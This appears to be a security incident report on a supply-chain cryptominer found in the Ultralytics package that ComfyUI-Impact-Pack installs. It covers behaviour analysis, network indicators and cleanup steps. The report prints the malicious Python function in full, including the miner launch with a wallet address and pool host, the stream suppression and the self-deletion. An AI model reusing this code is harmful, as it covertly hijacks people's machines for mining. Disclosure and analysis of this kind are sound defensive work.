Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Overview

Recently, unauthorized cryptocurrency mining activity was suspected while using ComfyUI with the ComfyUI-Impact-Pack extension. The issue originates from malicious Python code in the Ultralytics package, which attempts to use system resources for unauthorized mining operations.

Problem Description

The incident involves a downloaded module located at the following path (downloads.py): YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils

Malicious Code Sample

The following malicious code was detected:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

Behavior Analysis

1. Permission Change: Uses os.chmod to make the file executable.
2. Executing Malicious Commands: Connects to the mining pool server connect.consrensys.com:8080.
3. Process Hiding: Suppresses input, output, and error streams to avoid detection.
4. File Removal: Deletes the file after execution to hide evidence.

Risk Assessment

Potential Impacts

• High System Resource Usage: Mining significantly increases CPU/GPU load.
• Hardware Wear: Prolonged high usage may shorten hardware lifespan.
• Security Risks: Could endanger sensitive data or overall system security.

Source of the Issue

This malicious activity is linked to a suspicious version of the Ultralytics package, which appears to be installed as an automatic dependency of ComfyUI-Impact-Pack.

Installation Path

• Suspicious Package: Ultralytics version 8.3.41
• Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics

Trigger

Likely triggered by the install.py script in ComfyUI-Impact-Pack, which auto-installs dependencies.

Network Behavior Analysis

Target Domain

• Domain Name: connect.consrensys.com
• Port: 8080
• Purpose: Suspected mining pool endpoint, likely using the Stratum protocol.

Evidence

• Explicit mining pool connection details in the script.
• Use of a private key (e.g., 4BHRQHF...) indicates active mining account or operation.

Recommended Actions

1. Uninstall Suspicious Packages

   pip uninstall ultralytics ultralytics-thop
   

2. Remove ComfyUI-Impact-Pack Delete related directory:

   ./ComfyUI/custom_nodes/ComfyUI-Impact-Pack
   

3. Scan Your System Use antivirus software and malware detection tools to ensure no ongoing threats.

4. Monitor Network Connections Check for external connections to connect.consrensys.com and block it in the firewall.

5. Raise Awareness Share this report with the maintainers of ComfyUI and Ultralytics to prevent further abuse.

Additional Evidence

Related Details

• Code Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
• Behavior Pattern: Unauthorized file execution, mining pool connection, and evidence cleaning.
• Trigger Condition: Automatic dependency installation by ComfyUI-Impact-Pack.

References

• ComfyUI-Impact-Pack/issues/843

Conclusion

This incident highlights the risks of insufficient dependency review in open-source projects, which can expose users’ systems to malicious attacks. The open-source community should adopt stricter review mechanisms to protect end-users.